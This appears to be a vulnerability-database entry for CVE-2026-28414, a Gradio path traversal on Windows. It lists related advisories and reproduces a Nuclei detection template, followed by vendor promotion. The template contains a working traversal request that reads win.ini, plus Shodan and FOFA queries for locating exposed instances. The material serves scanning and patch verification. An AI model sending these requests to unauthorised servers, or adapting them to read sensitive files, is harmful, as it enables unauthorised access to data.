| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| CVE-2026-28414 | 27 Feb 202621:43 | – | attackerkb | |
| CVE-2026-28414 | 27 Feb 202620:22 | – | circl | |
| Gradio 安全漏洞 | 27 Feb 202600:00 | – | cnnvd | |
| CVE-2026-28414 | 27 Feb 202621:43 | – | cve | |
| CVE-2026-28414 Gradio has Absolute Path Traversal on Windows with Python 3.13+ | 27 Feb 202621:43 | – | cvelist | |
| EUVD-2026-9082 | 27 Feb 202621:43 | – | euvd | |
| Gradio is Vulnerable to Absolute Path Traversal on Windows with Python 3.13+ | 1 Mar 202601:28 | – | github | |
| CVE-2026-28414 | 27 Feb 202622:16 | – | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check | 22 Jul 202100:00 | – | openvas | |
| CVE-2026-28414 Gradio has Absolute Path Traversal on Windows with Python 3.13+ | 27 Feb 202621:43 | – | osv |
id: CVE-2026-28414
info:
name: Gradio - Absolute Path Traversal
author: 0x_Akoko
severity: high
description: |
Gradio < 6.7 on Windows with Python 3.13+ contains an absolute path traversal caused by incorrect path validation in path joining logic, letting unauthenticated attackers read arbitrary files from the server.
impact: |
Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive information.
remediation: |
Upgrade to version 6.7 or later.
reference:
- https://github.com/gradio-app/gradio/security/advisories/GHSA-39mp-8hj3-5c49
- https://nvd.nist.gov/vuln/detail/CVE-2026-28414
classification:
cve-id: CVE-2026-28414
epss-score: 0.03095
epss-percentile: 0.86152
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-36
metadata:
verified: true
max-request: 2
vendor: gradio-app
product: gradio
shodan-query: 'http.title:"Gradio"'
fofa-query: 'title="Gradio" || body="gradio-app"'
tags: cve,cve2026,gradio,lfi,traversal,unauth,windows,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: text/html
matchers:
- type: dsl
internal: true
dsl:
- 'status_code == 200'
- 'contains_all(to_lower(body), "window.gradio_config", "__gradio_mode__")'
condition: and
- raw:
- |
GET /static//windows/win.ini HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/plain")'
- 'contains_all(to_lower(body), "[fonts]", "[extensions]")'
condition: and
# digest: 4a0a004730450220103c1acaf1b7381afc068544577ef495deda37186c681bea6d799452a9fc97b3022100bc89ac3c12c53ead12471af9c905859332b6be2f104f34ef7aaebb10c2d784e2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation